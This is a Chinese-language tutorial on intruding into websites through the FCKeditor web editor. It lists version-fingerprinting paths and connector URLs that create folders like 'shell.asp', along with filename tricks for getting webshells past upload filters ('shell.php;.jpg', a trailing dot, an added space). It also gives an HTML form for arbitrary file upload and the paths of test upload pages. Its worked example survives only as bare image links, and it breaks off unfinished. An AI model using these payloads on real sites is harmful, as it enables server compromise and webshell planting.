先在这里做一个Fckeditor知识的了解：

FCKeditor是一个专门使用在网页上属于开放源代码的所见即所得文字编辑器。

现在利用其本身的开放源代码，进行一些漏洞性的入侵。当然网上也有相关知识，详细资料自己找
第一：查看编辑器版本
其相关默认路径如：

FCKeditor/_whatsnew.html
FCKeditor/editor/dialog/fck_about.html
FCKeditor/_samples/default.html

editor/filemanager/browser/default/browser.html?Connector=../../connectors/cfm/connector.cfm

editor/filemanager/connectors/asp/connector.asp
editor/filemanager/connectors/aspx/connector.aspx
editor/filemanager/connectors/php/connector.php
editor/filemanager/browser/default/browser.html


FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=qing.asp后在/up_files/image/目录下创建一个明文qing.asp的文件夹。
在上面的基础下，若Fckeditor版本为2.5
木马的格式可以为
a.aspx.a;.a.aspx.jpg..jpg

若Fckeditor版本为2.4.3
php的文件名加个问号，成功上传解析

/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
支持php的通杀，2.6.4和2.6.5测试未通过

//注：在V2.65中，会发现其过滤机制是以最后一个图片格式为终点点


fckeditor/editor/plugins/bbcode/_sample/sample.html 2.64
—————————————————————————————————————————————————————————————

2. Version 2.2 版本
Apache+linux 环境下在上传文件后面加个.突破！测试通过。
—————————————————————————————————————————————————————————————

3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制，导致用户上传任意文件！将以下保存为html文件，修改action地址。
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
< input type="file" name="NewFile" size="50"><br>
< input id="btnUpload" type="submit" value="Upload">
< /form>
—————————————————————————————————————————————————————————————

4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
很多时候上传的文件例如：shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
4.1：提交shell.php+空格绕过
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
4.2：继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹，只检测了第一级的目录，如果跳到二级目录就不受限制。
—————————————————————————————————————————————————————————————

5. 突破建立文件夹
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
—————————————————————————————————————————————————————————————

6. FCKeditor 中test 文件的上传地址
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
fckeditor/editor/filemanager/browser/default/frmupload.html
—————————————————————————————————————————————————————————————

7.常用上传地址
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://inc.jxbsu.com/fckeditor/editor/filemanager/connectors/php/connector.php (ver:2.6.3 测试通过)
JSP 版：
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/

现在来说一下Fckeditor上传实例

这里进行两种方法的的尝试，第一种：

http://s7/mw690/6b347b2ag7b12d4fa7dc6&690

http://s9/mw690/6b347b2agcebc521a07f8&690

URL: asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=

/pumpkin2.asp&NewFolderName=testtest


http://s6/mw690/6b347b2agcebc5271baf5&690

上传
URL: asp/connector.asp?Command=FileUpload&Type=Image&CurrentFolder=/pumpkin2.asp

http://s5/mw690/6b347b2ag7b12d5212f44&690

http://s5/mw690/6b347b2agcebc53b214f4&690

http://s16/mw690/6b347b2agcebc53facb6f&690

http://s1/mw690/6b347b2agcebc5d02a2e0&690



http://s11/mw690/6b347b2ag7b12d5422c7a&690

第二种方法：

http://s16/mw690/6b347b2agcebc55a83c3f&690

http://s15/mw690/6b347b2agcebc5785abfe&690

http://s5/mw690/6b347b2agcebc61033fb4&690



http://s5/mw690/6b347b2agcebc5891d774&690

http://s10/mw690/6b347b2ag7b12d5b3a449&690

http://s6/mw690/6b347b2ag7b12d5b9b215&690

到了这里，还要寻找突破的出口....待继